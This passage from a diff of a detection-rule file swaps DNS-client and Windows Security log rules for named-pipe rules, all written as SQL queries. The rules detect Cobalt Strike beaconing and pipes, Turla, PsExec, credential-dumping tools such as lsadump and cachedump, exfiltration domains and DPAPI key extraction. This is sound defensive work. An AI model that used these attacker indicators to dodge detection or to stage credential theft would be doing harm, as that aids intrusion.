'\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\')" ], - "filename": "win_dns_client_mega_nz.yml" + "filename": "pipe_created_mal_namedpipes.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", - "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "title": "CobaltStrike Named Pipe Pattern Regex", + "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,')" ], - "filename": "win_dns_client__mal_cobaltstrike.yml" + "filename": "pipe_created_mal_cobaltstrike_re.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - DNS Client", - "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", - "status": "experimental", - "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "ADFS Database Named Pipe Connection", + "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", + "status": "test", + "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Processes in the filter condition" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tssdis.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "win_dns_client_anonymfiles_com.yml" + "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - DNS Client", - "id": "090ffaad-c01a-4879-850c-6d57da98452d", - "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Named Pipes", + "id": "739915e4-1e70-4778-8b8a-17db02f66db1", + "status": "test", + "description": "Detects a named pipe used by Turla group samples", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.g0010", + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\')" ], - "filename": "win_dns_client_ufile_io.yml" + "filename": "pipe_created_apt_turla_namedpipes.yml" }, { - "title": "Query Tor Onion Address - DNS Client", - "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", + "title": "PAExec Default Named Pipe", + "id": "f6451de4-df0a-41fa-8d72-b39f54a08db5", "status": "test", - "description": "Detects DNS resolution of an .onion address related to Tor routing networks", + "description": "Detects PAExec default named pipe", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE PipeName LIKE '\\\\PAExec%' ESCAPE '\\'" ], - "filename": "win_dns_client_tor_onion.yml" + "filename": "pipe_created_paexec_default_pipe.yml" }, { - "title": "Protected Storage Service Access", - "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "title": "CobaltStrike Named Pipe Patterns", + "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", "status": "test", - "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", + "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Chrome instances using the exact same pipe name \"mojo.something\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" ], - "filename": "win_security_protected_storage_service_access.yml" + "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" }, { - "title": "Addition of SID History to Active Directory Object", - "id": "2632954e-db1c-49cb-9936-67d1ef1d17d2", - "status": "stable", - "description": "An attacker can use the SID history attribute to gain additional privileges.", - "author": "Thomas Patzke, @atc_project (improvements)", + "title": "CobaltStrike Named Pipe", + "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", + "status": "test", + "description": "Detects the creation of a named pipe as used by CobaltStrike", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1134.005" + "attack.t1055" ], "falsepositives": [ - "Migration of an account into a new domain" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4765', '4766') OR ((EventID = '4738' AND NOT ((SidHistory LIKE '-' ESCAPE '\\' OR SidHistory LIKE '\\%\\%1793' ESCAPE '\\'))) AND NOT (SidHistory = ''))))" + "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\')" ], - "filename": "win_security_susp_add_sid_history.yml" + "filename": "pipe_created_mal_cobaltstrike.yml" }, { - "title": "Suspicious Remote Logon with Explicit Credentials", - "id": "941e5c45-cda7-4864-8cea-bbb7458d194a", + "title": "PsExec Tool Execution From Suspicious Locations - PipeName", + "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", "status": "experimental", - "description": "Detects suspicious processes logging on with explicit credentials", - "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", + "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1078", - "attack.lateral_movement" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Administrators that use the RunAS command or scheduled tasks" + "Rare legitimate use of psexec from the locations mentioned above" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4648' AND (ProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\winrs.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')) AND NOT ((TargetServerName = 'localhost') OR (SubjectUserName LIKE '%$' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_susp_logon_explicit_credentials.yml" + "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" }, { - "title": "Account Tampering - Suspicious Failed Logon Reasons", - "id": "9eb99343-d336-4020-a3cd-67f3819e68ee", + "title": "DiagTrackEoP Default Named Pipe", + "id": "1f7025a6-e747-4130-aac4-961eb47015f1", "status": "experimental", - "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.initial_access", - "attack.t1078" - ], - "falsepositives": [ - "User using a disabled account" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4625', '4776') AND Status IN ('0xC0000072', '0xC000006F', '0xC0000070', '0xC0000413', '0xC000018C', '0xC000015B')) AND NOT (SubjectUserSid = 'S-1-0-0'))" - ], - "filename": "win_security_susp_failed_logon_reasons.yml" - }, - { - "title": "Windows Network Access Suspicious desktop.ini Action", - "id": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", - "status": "test", - "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", - "author": "Tim Shelton (HAWK.IO)", + "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.privilege_escalation" ], "falsepositives": [ - "Read only access list authority" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ObjectType = 'File' AND RelativeTargetName LIKE '%\\\\desktop.ini' ESCAPE '\\' AND (AccessList LIKE '%WriteData%' ESCAPE '\\' OR AccessList LIKE '%DELETE%' ESCAPE '\\' OR AccessList LIKE '%WriteDAC%' ESCAPE '\\' OR AccessList LIKE '%AppendData%' ESCAPE '\\' OR AccessList LIKE '%AddSubdirectory%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE PipeName LIKE '%thisispipe%' ESCAPE '\\'" ], - "filename": "win_security_net_share_obj_susp_desktop_ini.yml" + "filename": "pipe_created_diagtrack_eop_default_pipe.yml" }, { - "title": "DPAPI Domain Backup Key Extraction", - "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", - "status": "test", - "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "EfsPotato Named Pipe", + "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "status": "experimental", + "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" ], - "filename": "win_security_dpapi_domain_backupkey_extraction.yml" + "filename": "pipe_created_efspotato_namedpipe.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", - "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "title": "WMI Event Consumer Created Named Pipe", + "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1047", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\'" ], - "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" + "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" }, { - "title": "WMI Persistence - Security", - "id": "f033f3f3-fd24-4995-97d8-a3bb17550a88", + "title": "Alternate PowerShell Hosts Pipe", + "id": "58cb02d5-78ce-4692-b3e1-dce850aae41a", "status": "test", - "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", - "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Programs using PowerShell directly without invocation of a dedicated interpreter." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'WMI Namespace' AND ObjectName LIKE '%subscription%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\PSHost%' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ForefrontActiveDirectoryConnector.exe' ESCAPE '\\' OR NewProcessName LIKE '%c:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe' ESCAPE '\\')) OR (NewProcessName = '') OR (NewProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Tools\\\\Binn\\\\SQLPS.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ServerManager.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\'))))" ], - "filename": "win_security_wmi_persistence.yml" + "filename": "pipe_created_alternate_powershell_hosts_pipe.yml" }, { - "title": "Remote Access Tool Services Have Been Installed - Security", - "id": "c8b00925-926c-47e3-beea-298fd563728e", - "status": "experimental", - "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", - "author": "Connor Martin, Nasreddine Bencherchali (Nextron Systems)", + "title": "PsExec Pipes Artifacts", + "id": "9e77ed63-2ecf-4c7b-b09d-640834882028", + "status": "test", + "description": "Detecting use PsExec via Pipe Creation/Access to pipes", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1543.003", + "attack.lateral_movement", + "attack.t1021.002", + "attack.execution", "attack.t1569.002" ], "falsepositives": [ - "The rule doesn't look for anything suspicious so false positives are expected. If you use one of the tools mentioned, comment it out" + "Legitimate Administrator activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%SSUService%' ESCAPE '\\' OR ServiceFileName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceFileName LIKE '%Atera%' ESCAPE '\\' OR ServiceFileName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceFileName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceFileName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCService%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceFileName LIKE '%monblanking%' ESCAPE '\\' OR ServiceFileName LIKE '%RManService%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceFileName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceFileName LIKE '%vncserver%' ESCAPE '\\' OR ServiceFileName LIKE '%Parsec%' ESCAPE '\\' OR ServiceFileName LIKE '%chromoting%' ESCAPE '\\' OR ServiceFileName LIKE '%Zoho%' ESCAPE '\\' OR ServiceFileName LIKE '%jumpcloud%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (PipeName LIKE 'psexec%' ESCAPE '\\' OR PipeName LIKE 'paexec%' ESCAPE '\\' OR PipeName LIKE 'remcom%' ESCAPE '\\' OR PipeName LIKE 'csexec%' ESCAPE '\\')" ], - "filename": "win_security_service_install_remote_access_software.yml" + "filename": "pipe_created_psexec_pipes_artifacts.yml" }, { - "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", - "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", - "status": "test", - "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", - "author": "James Pemberton / @4A616D6573", + "title": "Koh Default Named Pipes", + "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "status": "experimental", + "description": "Detects creation of default named pipes used by the Koh tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001", - "attack.t1136.002" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1528", + "attack.t1134.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\')" ], - "filename": "win_security_susp_local_anon_logon_created.yml" + "filename": "pipe_created_koh_default_pipe.yml" }, { - "title": "Suspicious Access to Sensitive File Extensions", - "id": "91c945bc-2ad1-4799-a591-4d00198a1215", + "title": "Cred Dump-Tools Named Pipes", + "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", "status": "test", - "description": "Detects known sensitive file extensions accessed on a network share", - "author": "Samir Bousseaden", + "description": "Detects well-known credential dumping tools execution via specific named pipes", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.collection", - "attack.t1039" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Help Desk operator doing backup or re-imaging end user machine or backup software", - "Users working with these data types or exchanging message files" + "Legitimate Administrator using tool for password recovery" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%.pst' ESCAPE '\\' OR RelativeTargetName LIKE '%.ost' ESCAPE '\\' OR RelativeTargetName LIKE '%.msg' ESCAPE '\\' OR RelativeTargetName LIKE '%.nst' ESCAPE '\\' OR RelativeTargetName LIKE '%.oab' ESCAPE '\\' OR RelativeTargetName LIKE '%.edb' ESCAPE '\\' OR RelativeTargetName LIKE '%.nsf' ESCAPE '\\' OR RelativeTargetName LIKE '%.bak' ESCAPE '\\' OR RelativeTargetName LIKE '%.dmp' ESCAPE '\\' OR RelativeTargetName LIKE '%.kirbi' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\groups.xml' ESCAPE '\\' OR RelativeTargetName LIKE '%.rdp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\')" ], - "filename": "win_security_susp_raccess_sensitive_fext.yml" + "filename": "pipe_created_cred_dump_tools_named_pipes.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", - "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Sysmon Configuration Error", + "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", + "status": "experimental", + "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Highly unlikely" + "Legitimate administrative action" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE 